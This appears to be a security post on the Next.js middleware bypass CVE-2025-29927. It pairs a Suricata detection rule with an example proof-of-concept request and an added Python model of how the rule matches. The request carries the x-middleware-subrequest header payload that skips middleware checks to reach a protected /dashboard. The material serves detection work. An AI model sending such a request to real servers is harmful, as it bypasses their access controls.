In reference to CVE-2025-29927:
alert http any any -> $HTTP_SERVERS any (msg: "ET WEB_SERVER Next.js CVE-2025-29927 middleware bypass attempt"; flow: established, to_server; http.header_names; content: "|0d 0a|x-middleware-subrequest|0d 0a|"; nocase; reference:url,nextjs.org/blog/cve-2025-29927; reference:cve,2025-29927; metadata: attack_target Web_Server, deployment Datacenter, signature_severity Major, tag NextJS, affected_product NextJS_15_2_2, cve CVE_2025_29927, created_at 2025_03_23; classtype: web-application-attack; sid: 1; rev: 1;)
Example request using PoC:
GET /dashboard HTTP/1.1
Host: localhost:3000
User-Agent: curl/8.10.1
Accept: */*
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
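
Added example, not part of the original post: a Python model of how the rule's http.header_names match behaves, assuming Suricata's documented buffer layout (header names separated by CRLF, with a leading CRLF and an extra trailing CRLF). The helper names are hypothetical, and every request other than the PoC request above is constructed for illustration.

```python
# Added example: models the rule's match on Suricata's http.header_names buffer.
CRLF = b"\r\n"
# The rule's content with |0d 0a| decoded to CRLF.
RULE_CONTENT = b"\r\nx-middleware-subrequest\r\n"

def header_names_buffer(raw_request: bytes) -> bytes:
    """Build CRLF + names joined by CRLF + CRLF CRLF (assumed buffer layout)."""
    head = raw_request.split(CRLF + CRLF, 1)[0]
    names = []
    for line in head.split(CRLF)[1:]:          # skip the request line
        if line[:1] in (b" ", b"\t"):          # folded continuation, not a new header
            continue
        name, sep, _ = line.partition(b":")
        if sep:
            names.append(name.strip())
    return CRLF + CRLF.join(names) + CRLF + CRLF

def rule_matches(raw_request: bytes) -> bool:
    """Case-insensitive search, as the rule's nocase keyword specifies."""
    return RULE_CONTENT.lower() in header_names_buffer(raw_request).lower()

def build_request(extra_headers):
    """Assemble a request with the same base headers as the request above."""
    lines = [b"GET /dashboard HTTP/1.1", b"Host: localhost:3000",
             b"User-Agent: curl/8.10.1", b"Accept: */*"] + list(extra_headers)
    return CRLF.join(lines) + CRLF + CRLF

# The request shown above, followed by constructed variants.
POC = build_request(
    [b"x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"])
MIXED_CASE = build_request([b"X-Middleware-Subrequest: middleware"])  # constructed
BENIGN = build_request([])                                            # constructed
# Constructed, hypothetical header whose name only starts with the string.
LONGER_NAME = build_request([b"x-middleware-subrequest-id: 1"])
# Constructed: the string appears in a header value, not in a header name.
IN_VALUE = build_request([b"Referer: http://localhost:3000/?q=x-middleware-subrequest"])

if __name__ == "__main__":
    for label, req in [("poc", POC), ("mixed case", MIXED_CASE), ("benign", BENIGN),
                       ("longer name", LONGER_NAME), ("name in value", IN_VALUE)]:
        print(f"{label:14} alert={rule_matches(req)}")
```

The |0d 0a| bytes on both sides of the name make this an exact header-name match, so a longer header name or the same string inside a header value does not alert.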